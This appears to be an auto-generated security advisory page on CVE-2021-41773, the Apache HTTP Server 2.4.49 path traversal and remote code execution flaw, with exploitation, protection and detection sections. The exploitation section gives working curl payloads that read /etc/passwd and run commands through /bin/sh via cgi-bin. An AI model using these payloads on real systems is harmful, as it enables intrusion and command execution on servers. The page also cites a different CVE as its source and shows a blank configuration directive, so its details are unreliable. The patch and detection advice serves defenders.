Apache HTTP Server, Remote Code Execution, CVE-2021-41773 (Critical)

By /

How the Mentioned CVE Works:

CVE-2021-41773 is a critical vulnerability in Apache HTTP Server 2.4.49. It arises due to improper path normalization in the `ap_normalize_path()` function. Attackers can exploit this flaw by sending crafted HTTP requests to access files outside the document root directory. If the server is configured with `require all denied` missing or misconfigured, this can lead to remote code execution (RCE). The vulnerability allows attackers to execute arbitrary commands on the server by leveraging the ability to traverse directories and execute scripts.

DailyCVE Form:

Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal
Severity: Critical
Date: 2021-10-05

What Undercode Say:

Exploitation:

  1. Crafting Malicious Requests: Attackers send HTTP requests with encoded path traversal sequences (e.g., /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd).

2. Exploit Code:

curl -v "http://target-server/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

3. RCE Payload: If CGI scripts are enabled, attackers can execute commands: 

curl -v "http://target-server/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh" -d "echo;id"

Protection:

  1. Update Apache: Upgrade to Apache HTTP Server 2.4.50 or later.
  2. Configuration Check: Ensure `require all denied` is properly configured in `` directives.
  3. Input Validation: Sanitize and validate all user inputs to prevent path traversal.
  4. WAF Rules: Implement Web Application Firewall (WAF) rules to block malicious requests.

Detection:

  1. Log Monitoring: Check Apache logs for unusual path traversal patterns. 
    grep -i "../" /var/log/apache2/access.log
  2. Vulnerability Scanning: Use tools like Nessus or OpenVAS to detect vulnerable servers.

References:

Additional Commands:

  • Patch Installation: 
    sudo apt update && sudo apt install apache2
  • Test Vulnerability: 
    nmap --script http-vuln-cve2021-41773 -p 80 target-server

By following these steps, organizations can mitigate the risks associated with CVE-2021-41773 and secure their Apache HTTP Server instances.

References:

Reported By: https://www.cve.org/CVERecord?id=CVE-2022-43939
Extra Source Hub:
Undercode

Image Source:

Undercode AI DI v2Featured Image

Scroll to Top